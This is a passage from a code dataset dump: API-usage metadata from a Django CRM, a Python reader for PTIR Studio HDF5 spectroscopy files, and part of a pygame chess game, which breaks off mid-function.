"call"}, {"api_name": "os.path.join", "line_number": 92, "usage_type": "call"}, {"api_name": "os.path", "line_number": 92, "usage_type": "attribute"}, {"api_name": "django.conf.settings.PDF_OUTPUT_ROOT", "line_number": 92, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 92, "usage_type": "name"}, {"api_name": "koalixcrm.accounting.exceptions.NoObjectsToBeSerialzed", "line_number": 94, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext", "line_number": 94, "usage_type": "call"}, {"api_name": "koalixcrm.djangoUserExtension.models.UserExtension.objects.filter", "line_number": 103, "usage_type": "call"}, {"api_name": "koalixcrm.djangoUserExtension.models", "line_number": 103, "usage_type": "attribute"}, {"api_name": "koalixcrm.djangoUserExtension", "line_number": 103, "usage_type": "name"}, {"api_name": "koalixcrm.crm.exceptions.UserExtensionMissing", "line_number": 105, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext", "line_number": 105, "usage_type": "call"}, {"api_name": "xml.dom.minidom.Document", "line_number": 106, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 109, "usage_type": "call"}, {"api_name": "os.path", "line_number": 109, "usage_type": "attribute"}, {"api_name": "django.conf.settings.PDF_OUTPUT_ROOT", "line_number": 109, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 109, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 112, "usage_type": "call"}, {"api_name": "os.path", "line_number": 112, "usage_type": "attribute"}, {"api_name": "django.conf.settings.PDF_OUTPUT_ROOT", "line_number": 112, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 112, "usage_type": "name"}, {"api_name": "subprocess.check_output", "line_number": 169, "usage_type": "call"}, {"api_name": "django.conf.settings.FOP_EXECUTABLE", "line_number": 170, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 170, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 171, "usage_type": "call"}, {"api_name": "os.path", "line_number": 171, "usage_type": "attribute"}, {"api_name": "django.conf.settings.PDF_OUTPUT_ROOT", "line_number": 171, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 171, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 173, "usage_type": "call"}, {"api_name": "os.path", "line_number": 173, "usage_type": "attribute"}, {"api_name": "django.conf.settings.PDF_OUTPUT_ROOT", "line_number": 173, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 173, "usage_type": "name"}, {"api_name": "subprocess.STDOUT", "line_number": 173, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 174, "usage_type": "call"}, {"api_name": "os.path", "line_number": 174, "usage_type": "attribute"}, {"api_name": "django.conf.settings.PDF_OUTPUT_ROOT", "line_number": 174, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 174, "usage_type": "name"}, {"api_name": "subprocess.check_output", "line_number": 176, "usage_type": "call"}, {"api_name": "django.conf.settings.FOP_EXECUTABLE", "line_number": 177, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 177, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 178, "usage_type": "call"}, {"api_name": "os.path", "line_number": 178, "usage_type": "attribute"}, {"api_name": "django.conf.settings.PDF_OUTPUT_ROOT", "line_number": 178, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 178, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 180, "usage_type": "call"}, {"api_name": "os.path", "line_number": 180, "usage_type": "attribute"}, {"api_name": "django.conf.settings.PDF_OUTPUT_ROOT", "line_number": 180, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 180, "usage_type": "name"}, {"api_name": "subprocess.STDOUT", "line_number": 180, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 181, "usage_type": "call"}, {"api_name": "os.path", "line_number": 181, "usage_type": "attribute"}, {"api_name": "django.conf.settings.PDF_OUTPUT_ROOT", "line_number": 181, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 181, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext", "line_number": 190, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext", "line_number": 191, "usage_type": "call"}, {"api_name": "django.db.models.Model", "line_number": 194, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 194, "usage_type": "name"}, {"api_name": "django.db.models.IntegerField", "line_number": 195, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 195, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext", "line_number": 195, "usage_type": "call"}, {"api_name": "django.db.models.CharField", "line_number": 196, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 196, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext", "line_number": 196, "usage_type": "call"}, {"api_name": "django.db.models.CharField", "line_number": 197, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 197, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext", "line_number": 197, "usage_type": "call"}, {"api_name": "django.db.models.TextField", "line_number": 198, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 198, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext", "line_number": 198, "usage_type": "call"}, {"api_name": "django.db.models.BooleanField", "line_number": 199, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 199, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext", "line_number": 199, "usage_type": "call"}, {"api_name": "django.db.models.BooleanField", "line_number": 200, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 200, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext", "line_number": 200, "usage_type": "call"}, {"api_name": "django.db.models.BooleanField", "line_number": 201, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 201, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext", "line_number": 201, "usage_type": "call"}, {"api_name": "django.db.models.BooleanField", "line_number": 202, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 202, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext", "line_number": 202, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext", "line_number": 210, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext", "line_number": 260, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext", "line_number": 261, "usage_type": "call"}, {"api_name": "django.db.models.Model", "line_number": 265, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 265, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 266, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 266, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext", "line_number": 266, "usage_type": "call"}, {"api_name": "django.db.models.ForeignKey", "line_number": 267, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 267, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext", "line_number": 267, "usage_type": "call"}, {"api_name": "django.db.models.ForeignKey", "line_number": 269, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 269, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext", "line_number": 269, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext", "line_number": 274, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext", "line_number": 275, "usage_type": "call"}, {"api_name": "django.db.models.Model", "line_number": 281, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 281, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 282, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 282, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext", "line_number": 282, "usage_type": "call"}, {"api_name": "django.db.models.ForeignKey", "line_number": 283, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 283, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext", "line_number": 283, "usage_type": "call"}, {"api_name": "django.db.models.DecimalField", "line_number": 284, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 284, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext", "line_number": 284, "usage_type": "call"}, {"api_name": "django.db.models.CharField", "line_number": 285, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 285, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext", "line_number": 285, "usage_type": "call"}, {"api_name": "django.db.models.ForeignKey", "line_number": 286, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 286, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext", "line_number": 286, "usage_type": "call"}, {"api_name": "django.db.models.DateTimeField", "line_number": 287, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 287, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext", "line_number": 287, "usage_type": "call"}, {"api_name": "django.db.models.ForeignKey", "line_number": 288, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 288, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext", "line_number": 288, "usage_type": "call"}, {"api_name": "django.db.models.ForeignKey", "line_number": 289, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 289, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext", "line_number": 290, "usage_type": "call"}, {"api_name": "django.db.models.DateTimeField", "line_number": 291, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 291, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext", "line_number": 291, "usage_type": "call"}, {"api_name": "django.db.models.DateTimeField", "line_number": 292, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 292, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext", "line_number": 292, "usage_type": "call"}, {"api_name": "django.db.models.ForeignKey", "line_number": 293, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 293, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext", "line_number": 294, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext", "line_number": 299, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext", "line_number": 306, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext", "line_number": 307, "usage_type": "call"}]} +{"seq_id": "427267188", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jan 9 16:16:44 2020\n\n@author: carl\n\"\"\"\n\n# from struct import unpack\nimport h5py\nimport numpy as np\nfrom .image import Image\n\nclass PtirReader:\n \"\"\"\n A simple class to extract data from a PTIR Studio HDF5 file. This is meant\n as an alternative to .mat export and will only load the spectra from\n the scanned points, not the whole image in some specific wavenumber.\n\n Member variables:\n wh: image dimensions (w, h)\n wavenum: array of wavenumbers\n AB: data matrix, array(w*h, len(wn))\n image: tuple (img_data_bytes, img_type_str)\n \"\"\"\n\n def __init__(self, filename=None):\n \"\"\"\n filename: HDF5 file to load data from\n \"\"\"\n self.wh = None\n self.xy = None\n self.wavenum = None\n self.AB = None\n self.images = []\n if filename is not None:\n self.load(filename)\n\n def load(self, filename, clip_to_images=True):\n f = h5py.File(filename, mode='r')\n\n wns = []\n raw = []\n xy = []\n for k, v in f.items():\n if 'MirageDC' in v.attrs:\n wn = v['Spectroscopic_Values'][0,:]\n wns.append(wn)\n for kk, vv in v.items():\n try:\n r = vv['Raw_Data']\n except (AttributeError, ValueError):\n continue\n d = r[0,:]\n if d.shape != wn.shape:\n # print('incompatible shapes', d.shape, wn.shape)\n continue\n raw.append(d)\n try:\n xy.append([v.attrs['LocationX'][0],\n v.attrs['LocationY'][0]])\n except AttributeError:\n xy.append([0, 0])\n if not wns:\n raise RuntimeError('No spectra in input file')\n if not all([len(w) == len(wns[0]) for w in wns]):\n raise NotImplementedError('Unable to load spectra of different length')\n wns = np.array(wns)\n beg = wns[:,0]\n end = wns[:,-1]\n if beg.max() - beg.min() > 5 or end.max() - end.min() > 5:\n raise NotImplementedError('Unable to load spectra with different wavenumbers')\n self.wavenum = np.median(wns, axis=0)[::-1]\n self.AB = np.array(raw)[:, ::-1]\n self.xy = np.array(xy)\n self.wh = (len(self.AB), 1)\n\n self.images = []\n for imtype in ['Image', 'Heightmap']:\n for imnum in range(1000):\n try:\n im = f['%ss' % (imtype)]['%s_%03d' % (imtype, imnum)]\n except (KeyError):\n break\n else:\n if imtype == 'Image':\n imname = im.name\n else:\n imwnum = im.attrs['IRWavenumber'].decode()\n imname=imwnum + \" \" + im.attrs['Label'].decode()\n img = Image(data=im[()][::-1,:], name=imname)\n img.xy = ([im.attrs['PositionX'][0],\n im.attrs['PositionY'][0]])\n img.wh = ([im.attrs['SizeWidth'][0],\n im.attrs['SizeHeight'][0]])\n self.images.append(img)\n\n if clip_to_images:\n # Remove pixel outside imaging area (always the first one?)\n imgxy = np.array([img.xy for img in self.images])\n imgwh = np.array([img.wh for img in self.images])\n minxy = (imgxy - imgwh / 2).min(0)\n maxxy = (imgxy + imgwh / 2).max(0)\n inside = (minxy <= self.xy).all(1) & (self.xy <= maxxy).all(1)\n self.xy = self.xy[inside,:]\n self.AB = self.AB[inside,:]\n self.wh = (len(self.AB), 1)\n", "sub_path": "octavvs/io/ptirreader.py", "file_name": "ptirreader.py", "file_ext": "py", "file_size_in_byte": 3896, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "h5py.File", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 74, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 75, "usage_type": "call"}, {"api_name": "image.Image", "line_number": 91, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 101, "usage_type": "call"}]} +{"seq_id": "146121284", "text": "import sys\nimport random\nimport pygame\nfrom gameConstants import *\nfrom menu import *\n\n\n\"\"\"\nInstances of this class represent a single square on an 8x8 chessboard.\nEach square has the following attributes: \n- color (black or white) \n- position (eg: top left square is at position (1, 1))\n- side length\n- square (which is a pygame.Rect object which is used to detect if a \n particular square is clicked)\n- location (the location to assign to the topleft corner of the square\n attribute)\n\"\"\"\nclass ChessSquare:\n\tcolor = 0, 0, 0\n\tposition = 0, 0\n\tsquare = None\n\tsidelength = 0\n\tlocation = 0, 0\n\tdef __init__(self, color, position, sidelength, location):\n\t\tself.color = color\n\t\tself.position = position\n\t\tself.sidelength = sidelength\n\t\tself.location = location\n\t\tself.square = pygame.Rect((self.location), (self.sidelength, self.sidelength))\n\n\t\"\"\"\n\tDraws the square (by invoking pygame.draw.rect) to the surface\n\tpassed in the screen argument.\n\t\"\"\"\n\tdef draw(self, screen):\n\t\tpygame.draw.rect(screen, self.color, self.square)\n\nclass Board:\n\tsurface = None\n\trect = None\n\tsquareList = []\n\tpieceListWhite = []\n\tpieceListBlack = []\n\tcurrentPieceList = []\n\twaitingPieceList = []\n\tselectedPiece = None\n\tdoubleUpPawn = None\n\tenPassantSpace = None\n\thighlightedSquares = []\n\n\tdef __init__(self, surface, position, sideLength):\n\t\tself.surface = surface\n\t\tself.rect = pygame.draw.rect(surface, BLACK, ((position), (sideLength, sideLength)))\n\t\tsquareLength = sideLength/8\n\t\tfor i in range(0, 8):\n\t\t\tfor j in range(0, 8):\n\t\t\t\tcurrentSquarePos = i*squareLength+position[0], j*squareLength+position[1]\n\t\t\t\tsquarecolor = BROWN if (i+j)%2 == 0 else BLACK\n\t\t\t\tnewSquare = ChessSquare(squarecolor, (j+1, i+1), squareLength, currentSquarePos)\n\t\t\t\tself.squareList.append(newSquare)\n\t\t\n\t\tself.setInitialPositions()\n\t\tfor piece in self.pieceListWhite:\n\t\t\tpiece.updatePotentialSpaces(self.pieceListWhite, self.pieceListBlack, False)\n\t\tfor piece in self.pieceListBlack:\n\t\t\tpiece.updatePotentialSpaces(self.pieceListBlack, self.pieceListWhite, False)\n\t\tself.currentPieceList = self.pieceListWhite\n\t\tself.waitingPieceList = self.pieceListBlack\n\n\tdef setInitialPositions(self):\n\t\t#initialize white pieces\n\t\tfor i in range(8):\n\t\t\tself.pieceListWhite.append(Pawn(whitePawnImage, self.getSquarebyPosition((7, i+1)), player1Color))\n\t\tself.pieceListWhite.append(Rook(whiteRookImage, self.getSquarebyPosition((8, 1)), player1Color))\n\t\tself.pieceListWhite.append(Rook(whiteRookImage, self.getSquarebyPosition((8, 8)), player1Color))\n\t\tself.pieceListWhite.append(Knight(whiteKnightImage, self.getSquarebyPosition((8, 2)), player1Color))\n\t\tself.pieceListWhite.append(Knight(whiteKnightImage, self.getSquarebyPosition((8, 7)), player1Color))\n\t\tself.pieceListWhite.append(Bishop(whiteBishopImage, self.getSquarebyPosition((8, 3)), player1Color))\n\t\tself.pieceListWhite.append(Bishop(whiteBishopImage, self.getSquarebyPosition((8, 6)), player1Color))\n\t\tself.pieceListWhite.append(Queen(whiteQueenImage, self.getSquarebyPosition((8, 4)), player1Color))\n\t\tself.pieceListWhite.append(King(whiteKingImage, self.getSquarebyPosition((8, 5)), player1Color))\n\t\t#initialize black pieces\n\t\tfor i in range(8):\n\t\t\tself.pieceListBlack.append(Pawn(blackPawnImage, self.getSquarebyPosition((2, i+1)), player2Color))\n\t\tself.pieceListBlack.append(Rook(blackRookImage, self.getSquarebyPosition((1, 1)), player2Color))\n\t\tself.pieceListBlack.append(Rook(blackRookImage, self.getSquarebyPosition((1, 8)), player2Color))\n\t\tself.pieceListBlack.append(Knight(blackKnightImage, self.getSquarebyPosition((1, 2)), player2Color))\n\t\tself.pieceListBlack.append(Knight(blackKnightImage, self.getSquarebyPosition((1, 7)), player2Color))\n\t\tself.pieceListBlack.append(Bishop(blackBishopImage, self.getSquarebyPosition((1, 3)), player2Color))\n\t\tself.pieceListBlack.append(Bishop(blackBishopImage, self.getSquarebyPosition((1, 6)), player2Color))\n\t\tself.pieceListBlack.append(Queen(blackQueenImage, self.getSquarebyPosition((1, 4)), player2Color))\n\t\tself.pieceListBlack.append(King(blackKingImage, self.getSquarebyPosition((1, 5)), player2Color))\n\n\tdef draw(self):\n\t\tfor square in self.squareList:\n\t\t\tsquare.draw(self.surface)\n\t\tfor piece in self.pieceListWhite:\n\t\t\tpiece.draw(self.surface)\n\t\tfor piece in self.pieceListBlack:\n\t\t\tpiece.draw(self.surface)\n\n\tdef getSquarebyPosition(self, position):\n\t\tfor square in self.squareList:\n\t\t\tif position == square.position:\n\t\t\t\treturn square\n\t\treturn None\n\n\tdef getSquarebyMousePosition(self, position):\n\t\tfor square in self.squareList:\n\t\t\tif square.square.collidepoint(position):\n\t\t\t\treturn square\n\t\treturn None\n\n\t@staticmethod\n\tdef isOccupied(pieceList, position):\n\t\tfor piece in pieceList:\n\t\t\tif position == piece.position:\n\t\t\t\treturn True\n\t\treturn False\n\n\t@staticmethod\n\tdef getPiecebyRank(pieceList, rank):\n\t\tfor piece in pieceList:\n\t\t\tif piece.rank == rank:\n\t\t\t\treturn piece\n\t\treturn None\n\n\t@staticmethod\n\tdef getPiecebyPosition(pieceList, position):\n\t\tfor piece in pieceList:\n\t\t\tif piece.position == position:\n\t\t\t\treturn piece\n\t\treturn None\n\n\tdef highlightMovableSquares(self, piece):\n\t\tself.highlightedSquares = []\n\t\tfor space in piece.potentialSpaces:\n\t\t\tself.highlightedSquares.append(self.getSquarebyPosition(space))\n\t\tfor square in self.highlightedSquares:\n\t\t\tcolor = YELLOW if (square.position[0] + square.position[1]) % 2 == 0 else YELLOW2\n\t\t\tsquare.color = color\n\t\t\tsquare.draw(self.surface)\n\t\t\tfor piece in self.waitingPieceList:\n\t\t\t\tif square.position == piece.position:\n\t\t\t\t\tpiece.draw(self.surface)\n\t\t\t\t\tbreak\n\n\tdef unhighlightMovableSquares(self):\n\t\tfor square in self.highlightedSquares:\n\t\t\tcolor = BROWN if (square.position[0] + square.position[1]) % 2 == 0 else BLACK\n\t\t\tsquare.color = color\n\t\t\tsquare.draw(self.surface)\n\t\t\tfor piece in self.waitingPieceList:\n\t\t\t\tif square.position == piece.position:\n\t\t\t\t\tpiece.draw(self.surface)\n\t\t\t\t\tbreak\n\n\t@staticmethod\n\tdef getGameState(threateningPiece, currentPieceList, waitingPieceList):\n\t\tif Board.checked(threateningPiece, currentPieceList, waitingPieceList):\n\t\t\tpygame.mixer.music.load(checkSound)\n\t\t\tpygame.mixer.music.play()\n\t\tthreateningPiece.updatePotentialSpaces(currentPieceList, waitingPieceList, False)\n\t\twaitingKingPosition = Board.getPiecebyRank(waitingPieceList, kingRank).position\n\t\tallOpponentSpaces = []\n\t\tfor piece in waitingPieceList:\n\t\t\tpiece.updatePotentialSpaces(waitingPieceList, currentPieceList, True)\n\t\t\tallOpponentSpaces += piece.potentialSpaces\n\t\tif len(allOpponentSpaces) == 0:\n\t\t\tif waitingKingPosition in threateningPiece.potentialSpaces:\n\t\t\t\treturn CHECKMATE\n\t\t\telse:\n\t\t\t\treturn STALEMATE\n\t\treturn RUNNING\n\n\t@staticmethod\n\tdef checked(threateningPiece, threateningPieceList, threatenedPieceList):\n\t\tthreateningPiece.updatePotentialSpaces(threateningPieceList, threatenedPieceList, False)\n\t\twaitingKingPosition = Board.getPiecebyRank(threatenedPieceList, kingRank).position\n\t\tif waitingKingPosition in threateningPiece.potentialSpaces:\n\t\t\treturn True\n\t\treturn False\n\n\tdef checkPawnPromotion(self, pawn, pawnPieceList):\n\t\tif pawn.rank != pawnRank: return\n\t\tif pawn.position[0] == 1 and pawn.color == player1Color or pawn.position[0] == 8 and pawn.color == player2Color:\n\t\t\tnewPiece = None\n\t\t\tcolor = pawn.color\n\t\t\tnewRank = launchPromotionMenu(self.surface, 600, 600, color)\n\t\t\tif newRank == PROMOTETOQUEEN:\n\t\t\t\timage = whiteQueenImage if color == player1Color else blackQueenImage\n\t\t\t\tnewPiece = Queen(image, self.getSquarebyPosition(pawn.position), color)\n\t\t\telif newRank == PROMOTETOROOK:\n\t\t\t\timage = whiteRookImage if color == player1Color else blackRookImage\n\t\t\t\tnewPiece = Rook(image, self.getSquarebyPosition(pawn.position), color)\n\t\t\telif newRank == PROMOTETOBISHOP:\n\t\t\t\timage = whiteBishopImage if color == player1Color else blackBishopImage\n\t\t\t\tnewPiece = Bishop(image, self.getSquarebyPosition(pawn.position), color)\n\t\t\telif newRank == PROMOTETOKNIGHT:\n\t\t\t\timage = whiteKnightImage if color == player1Color else blackKnightImage\n\t\t\t\tnewPiece = Knight(image, self.getSquarebyPosition(pawn.position), color)\n\t\t\tpawnPieceList.remove(pawn)\n\t\t\tpawnPieceList.append(newPiece)\n\t\t\tself.selectedPiece = newPiece\n\n\tdef checkEnPassant(self, pawn, pawnPieceList, opponentPieceList):\n\t\tpotentialSpace = self.enPassantSpace\n\t\tif abs(pawn.position[0]-potentialSpace[0]) != 1 or abs(pawn.position[1]-potentialSpace[1]) != 1:\n\t\t\treturn\n\t\tfutureOpponentPieceList = opponentPieceList.copy()\n\t\tfutureOpponentPieceList.remove(self.doubleUpPawn)\n\t\tif not pawn.leavesKingOpen(pawnPieceList, futureOpponentPieceList, potentialSpace):\n\t\t\tpawn.potentialSpaces.append(potentialSpace)\n\n\tdef castle(self, king, rook, newKingPosition):\n\t\toldRookSquare = self.getSquarebyPosition(rook.position)\n\t\toldRookSquare.draw(self.surface)\n\t\toldKingSquare = self.getSquarebyPosition(king.position)\n\t\toldKingSquare.draw(self.surface)\n\t\tnewKingSquare = self.getSquarebyPosition(newKingPosition)\n\t\tking.move(newKingSquare)\n\t\tif rook.position[1] > king.position[1]:\n\t\t\tnewRookSquare = self.getSquarebyPosition((newKingPosition[0], newKingPosition[1]-1))\n\t\t\trook.move(newRookSquare)\n\t\telse:\n\t\t\tnewRookSquare = self.getSquarebyPosition((newKingPosition[0], newKingPosition[1]+1))\n\t\t\trook.move(newRookSquare)\n\t\tself.unhighlightMovableSquares()\n\t\tking.draw(self.surface)\n\t\trook.draw(self.surface)\n\n\tdef reset(self):\n\t\tself.pieceListWhite = []\n\t\tself.pieceListBlack = []\n\t\tself.setInitialPositions()\n\t\tself.currentPieceList = self.pieceListWhite\n\t\tself.waitingPieceList = self.pieceListBlack\n\t\tself.selectedPiece = None\n\n\tdef changeTurn(self):\n\t\ttemp = self.currentPieceList\n\t\tself.currentPieceList = self.waitingPieceList\n\t\tself.waitingPieceList = temp\n\t\tself.selectedPiece = None\n\n\tdef rotate(self):\n\t\tfor piece in self.pieceListWhite:\n\t\t\tnewSquare = self.getSquarebyPosition((9-piece.row, 9-piece.col))\n\t\t\tpiece.setPosition(newSquare)\n\t\tfor piece in self.pieceListBlack:\n\t\t\tnewSquare = self.getSquarebyPosition((9-piece.row, 9-piece.col))\n\t\t\tpiece.setPosition(newSquare)\n\n\tdef playKillSound(self):\n\t\trandIndex = random.randrange(0, len(captureSounds))\n\t\tpygame.mixer.music.load(captureSounds[randIndex])\n\t\tpygame.mixer.music.play()\n\n\tdef playPVP(self):\n\t\twhile True:\n\t\t\tpygame.display.update()\n\t\t\tfor event in pygame.event.get():\n\t\t\t\tif event.type == pygame.QUIT:\n\t\t\t\t\tendOption = launchEndMenu(screen, EXIT, self.currentPieceList[0].color,\n\t\t\t\t\t self.waitingPieceList[0].color)\n\t\t\t\t\tif endOption == QUIT:\n\t\t\t\t\t\tpygame.quit()\n\t\t\t\t\t\tsys.exit()\n\t\t\t\t\telif endOption == REMATCH:\n\t\t\t\t\t\tboard.reset()\n\t\t\t\t\t\tboard.draw()\n\t\t\t\t\t\tbreak\n\t\t\t\t\telif endOption == MAINMENU:\n\t\t\t\t\t\tboard.reset()\n\t\t\t\t\t\treturn\n\t\t\t\tif event.type == pygame.MOUSEBUTTONDOWN:\n\t\t\t\t\tif self.doubleUpPawn and self.doubleUpPawn.color == self.currentPieceList[0].color:\n\t\t\t\t\t\tself.doubleUpPawn = None\n\t\t\t\t\t\tself.enPassantSpace = None\n\t\t\t\t\tclickpos = pygame.mouse.get_pos()\n\t\t\t\t\tclickedSquare = self.getSquarebyMousePosition(clickpos)\n\t\t\t\t\tif clickedSquare:\n\t\t\t\t\t\tclickedPosition = clickedSquare.position\n\t\t\t\t\t\tisMyPiece = False\n\t\t\t\t\t\tclickedPiece = Board.getPiecebyPosition(self.currentPieceList, clickedPosition)\n\t\t\t\t\t\tif clickedPiece: isMyPiece = True\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tclickedPiece = Board.getPiecebyPosition(self.waitingPieceList, clickedPosition)\n\t\t\t\t\t\t\tisMyPiece = False\n\t\t\t\t\t\tif clickedPiece:\n\t\t\t\t\t\t\tif not self.selectedPiece:\n\t\t\t\t\t\t\t\tif isMyPiece:\n\t\t\t\t\t\t\t\t\tself.selectedPiece = clickedPiece\n\t\t\t\t\t\t\t\t\tselectedRank = self.selectedPiece.rank\n\t\t\t\t\t\t\t\t\tprint(\"piece at \", clickedPiece.position, \" selected!\")\n\t\t\t\t\t\t\t\t\tclickedSquare.color = RED\n\t\t\t\t\t\t\t\t\tclickedSquare.draw(board.surface)\n\t\t\t\t\t\t\t\t\tclickedPiece.draw(board.surface)\n\t\t\t\t\t\t\t\t\tclickedSquare.color = BROWN if (clickedPosition[0]+clickedPosition[1])%2 == 0 else BLACK\n\t\t\t\t\t\t\t\t\tself.selectedPiece.updatePotentialSpaces(self.currentPieceList, self.waitingPieceList, True)\n\t\t\t\t\t\t\t\t\tif selectedRank == pawnRank and self.doubleUpPawn:\n\t\t\t\t\t\t\t\t\t\tif self.selectedPiece.color == player1Color:\n\t\t\t\t\t\t\t\t\t\t\tself.enPassantSpace = self.doubleUpPawn.position[0]-1, self.doubleUpPawn.position[1]\n\t\t\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\t\t\tself.enPassantSpace = self.doubleUpPawn.position[0]+1, self.doubleUpPawn.position[1]\n\t\t\t\t\t\t\t\t\t\tself.checkEnPassant(self.selectedPiece, self.currentPieceList, self.waitingPieceList)\n\t\t\t\t\t\t\t\t\tself.highlightMovableSquares(self.selectedPiece)\n\t\t\t\t\t\t\telif self.selectedPiece == clickedPiece:\n\t\t\t\t\t\t\t\tself.selectedPiece = None\n\t\t\t\t\t\t\t\tprint(\"piece at \", clickedPiece.position, \" deselected!\")\n\t\t\t\t\t\t\t\tclickedSquare.color = BROWN if (clickedPosition[0]+clickedPosition[1])%2 == 0 else BLACK\n\t\t\t\t\t\t\t\tclickedSquare.draw(board.surface)\n\t\t\t\t\t\t\t\tclickedPiece.draw(board.surface)\n\t\t\t\t\t\t\t\tself.unhighlightMovableSquares()\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tif clickedPosition in self.selectedPiece.potentialSpaces:\n\t\t\t\t\t\t\t\t\tprint(\"piece at \", self.selectedPiece.position, \" kills piece at \", clickedPiece.position)\n\t\t\t\t\t\t\t\t\tself.playKillSound()\n\t\t\t\t\t\t\t\t\tself.waitingPieceList.remove(clickedPiece)\n\t\t\t\t\t\t\t\t\toldSquare = board.getSquarebyPosition(self.selectedPiece.position)\n\t\t\t\t\t\t\t\t\toldSquare.draw(board.surface)\n\t\t\t\t\t\t\t\t\tclickedSquare.draw(board.surface)\n\t\t\t\t\t\t\t\t\tself.unhighlightMovableSquares()\n\t\t\t\t\t\t\t\t\tself.selectedPiece.move(clickedSquare)\n\t\t\t\t\t\t\t\t\tself.checkPawnPromotion(self.selectedPiece, self.currentPieceList)\n\t\t\t\t\t\t\t\t\tself.selectedPiece.draw(board.surface)\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t#looking for checkmate!\n\t\t\t\t\t\t\t\t\tgameState = Board.getGameState(self.selectedPiece, self.currentPieceList, self.waitingPieceList)\n\t\t\t\t\t\t\t\t\tif gameState == CHECKMATE or gameState == STALEMATE:\n\t\t\t\t\t\t\t\t\t\tendOption = launchEndMenu(screen, gameState, 